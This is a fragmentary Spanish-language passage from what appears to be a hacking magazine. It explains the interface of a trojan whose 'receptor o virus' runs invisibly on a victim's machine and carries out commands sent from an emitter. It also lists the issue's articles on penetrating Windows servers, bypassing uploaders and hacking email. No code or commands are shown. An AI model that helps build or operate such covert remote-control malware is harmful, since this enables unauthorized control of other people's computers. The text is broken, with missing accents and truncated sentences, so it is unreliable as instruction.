solo tenemos que escribir comandos,
por default se escribirn en mayus,
no debemos olvidar que todos vienen
entre corchetes, y que para enviar solo

El cuadro Verde Que se encuentra


en la esquina superior izquierda indica si esta escuchando o est enviando,
cuando aparece es que est escuchando por lo cual no nos permitir escribir hasta que le demos clic a donde
queremos escribir esto lo apagara hasta que enviemos un ENTER, esto lo
activara y seguir escuchando.
RECEPTOR O VIRUS
En este screenshot mostraremos como
es que se ve el test o el de prueba, ya
que en realidad cuando se ejecuta este
no se ve ,En la parte superior es donde
se muestran los comandos y lo enviado por el emisor, en este caso aparece
Hola Mi Lord esto ocurre ya que
al crearse los archivos en el servidor
se guarda as el archivo de texto, tu
puedes enviar texto con el emisor asi
como una conversacin y el receptor
la recibir aunque este no har nada,
cada que recibe un comando este responde diciendo que el comando ha
sido ejecutado.

www.hackingmexico.mx

43

#02

www.hackingmexico.mx / PENETRANDO TU MENTE / AO 0 / # 02

Algo ms all de lo visible


Ingeniera social
Penetracin de servidores windows
Bypassing de Uploaders
WarDriving
Nxt Controler Un troyano Para divertirse
Hackeando Correos

Vous aimerez peut-être aussi